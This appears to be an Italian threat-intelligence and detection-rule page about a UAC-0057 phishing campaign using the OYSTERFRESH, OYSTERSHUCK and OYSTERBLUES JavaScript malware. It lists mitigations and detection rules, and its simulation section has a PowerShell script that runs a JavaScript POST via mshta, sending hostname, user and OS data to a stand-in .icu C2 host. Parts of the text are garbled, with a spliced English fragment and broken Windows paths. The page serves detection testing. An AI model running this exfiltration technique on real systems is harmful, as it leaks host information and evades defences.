UAC-0057 Aggiorna il Suo Toolkit con OYSTERFRESH, OYSTERSHUCK e OYSTERBLUES
Detection stack
- AIDR
- Alert
- ETL
- Query
Sommario
CERT-UA ha segnalato una campagna di phishing mirata alle organizzazioni governative ucraine. Le email contengono allegati PDF che reindirizzano i destinatari ad archivi ZIP che trasportano file JavaScript dannosi noti come OYSTERFRESH, OYSTERSHUCK e OYSTERBLUES. Una volta eseguito, il malware raccoglie informazioni di sistema e le invia tramite richieste HTTP POST, con l’opzione di recuperare successivamente un componente Cobalt Strike. L’infrastruttura di supporto è nascosta dietro Cloudflare e fa ampio uso di .icu domini.
Indagine
L’analisi di CERT-UA ha identificato i campioni di JavaScript dannosi, i metodi di decodifica su cui si basano, inclusi inversione di stringa, ROT13 e decodifica URL, e le modifiche al registro utilizzate per mantenere la persistenza. Gli investigatori hanno anche documentato diversi artefatti di file e percorsi Windows associati alla catena di infezione. L’analisi della rete ha collegato l’attività all’infrastruttura di hosting protetta da Cloudflare. Il rapporto osserva inoltre la possibile consegna successiva di un Cobalt Strike beacon. .icu hosting infrastructure. The report further notes the possible follow-on delivery of a Cobalt Strike beacon.
Mitigazione
Le organizzazioni dovrebbero limitare l’esecuzione di wscript.exe per gli utenti standard, limitare l’esecuzione di PowerShell e JavaScript e monitorare le chiavi Run del registro elencate per cambiamenti sospetti. Dovrebbe essere utilizzato il filtraggio web per bloccare .icu domini e, ove opportuno, gli intervalli IP correlati a Cloudflare associati alla campagna. I difensori dovrebbero anche applicare controlli di minimo privilegio e prevenire l’esecuzione automatica di binari sconosciuti.
Risposta
I team di sicurezza dovrebbero creare rilevamenti per i nomi di file identificati, le chiavi di registro e il traffico HTTP POST in uscita verso i domini noti. La caccia dovrebbe coprire anche il possibile payload Cobalt Strike, inclusi il CSBEACON DLL, e qualsiasi attività pianificata nominata MicrosoftEdgeUpdateTaskMachine. Le indagini sugli endpoint dovrebbero raccogliere alberi di processi per tracciare la catena di decodifica ed esecuzione di JavaScript.
Flusso di Attacco
Rilevamenti
Punti di Persistenza Possibili [ASEPs – Software/NTUSER Hive] (via registry_event)
Visualizza
Estensione File Sospetta Aggiunta alle Chiavi Run [ASEPs] (via registry_event)
Visualizza
Estrazione Archivio Direttamente dal Client di Posta (via process_creation)
Visualizza
Esecuzione da Archivio ZIP [7zip] (via process_creation)
Visualizza
Esecuzione da Archivio RAR [WinRAR] (via process_creation)
Visualizza
LOLBAS WScript / CScript (via process_creation)
Visualizza
LOLBAS RunDLL32 (via cmdline)
Visualizza
File Estratti Sospetti da un Archivio (via file_event)
Visualizza
Attività Pianificata Sospetta (via audit)
Visualizza
Controllo e Comando Sospetto tramite Richiesta DNS di Dominio di Primo Livello (TLD) Insolito (via dns)
Visualizza
IOC (HashSha256) da rilevare: Toolkit aggiornato UAC-0057: OYSTERFRESH, OYSTERSHUCK e OYSTERBLUES Parte 2
Visualizza
IOC (HashSha256) da rilevare: Toolkit aggiornato UAC-0057: OYSTERFRESH, OYSTERSHUCK e OYSTERBLUES Parte 1
Visualizza
IOC (HashSha1) da rilevare: Toolkit aggiornato UAC-0057: OYSTERFRESH, OYSTERSHUCK e OYSTERBLUES
Visualizza
IOC (HashMd5) da rilevare: Toolkit aggiornato UAC-0057: OYSTERFRESH, OYSTERSHUCK e OYSTERBLUES Parte 2
Visualizza
IOC (HashMd5) da rilevare: Toolkit aggiornato UAC-0057: OYSTERFRESH, OYSTERSHUCK e OYSTERBLUES Parte 1
Visualizza
IOC (SourceIP) da rilevare: Toolkit aggiornato UAC-0057: OYSTERFRESH, OYSTERSHUCK e OYSTERBLUES
Visualizza
IOC (DestinationIP) da rilevare: Toolkit aggiornato UAC-0057: OYSTERFRESH, OYSTERSHUCK e OYSTERBLUES
Visualizza
Rilevamento di Esfiltrazione OYSTERBLUES tramite HTTP POST a Domini .icu [Connessione di Rete Windows]
Visualizza
Rilevamento di Esecuzione JavaScript Dannoso tramite wscript.exe [Creazione del Processo Windows]
Visualizza
Esecuzione della Simulazione
Prerequisito: Il Controllo di Prevolo della Telemetria e del Baseline deve essere stato superato.
Motivazione: Questa sezione dettaglia l’esatta esecuzione della tecnica avversaria (TTP) progettata per attivare la regola di rilevamento. I comandi e la narrazione riflettono direttamente le TTP identificate e producono l’esatta telemetria prevista dalla logica di rilevamento.
-
Narrativa e Comandi dell’Attacco:
L’avversario utilizza un binario Windows firmato (mshta.exe) per eseguire un piccolo payload JavaScript che raccoglie informazioni di sistema e le esfiltra tramite un HTTP POST a un dominio “*.icu” malevolo controllato dal server C2. Questo approccio “living‑off‑the‑land” evita di sollevare allarmi AV mentre genera l’evento firewall esatto che la regola monitora (POST + “.icu”). -
Script di Test di Regressione:
# Simulazione di esfiltrazione in stile OYSTERBLUES # 1. Codifica informazioni di sistema minime in JSON $info = @{ hostname = $env:COMPUTERNAME user = $env:USERNAME os = (Get-CimInstance -ClassName Win32_OperatingSystem).Caption } | ConvertTo-Json -Compress # 2. Scrivi un file HTML temporaneo che esegue un JS fetch POST $htmlPath = "$env:TEMPexfil.html" $js = @" var data = '$info'; fetch('http://malicious-c2.abc.icu/collect', { method: 'POST', headers: { 'Content-Type': 'application/json' }, body: data }); "@ Set-Content -Path $htmlPath -Value "<script>$js</script>" -Encoding ASCII # 3. Esegui tramite mshta (esecuzione proxy binaria firmata) Start-Process -FilePath "$env:SystemRootSystem32mshta.exe" -ArgumentList "`"$htmlPath`"" # 4. Dai tempo alla richiesta di completarsi, quindi pulisci Start-Sleep -Seconds 5 Remove-Item -Path $htmlPath -Force -
Comandi di Pulizia:
# Assicurati che qualsiasi processo mshta residuo sia terminato Get-Process -Name mshta -ErrorAction SilentlyContinue | Stop-Process -Force # Rimuovi eventuali file temporanei residui (se presenti) $tempFiles = Get-ChildItem -Path $env:TEMP -Filter "exfil.html" foreach ($file in $tempFiles) { Remove-Item $file.FullName -Force }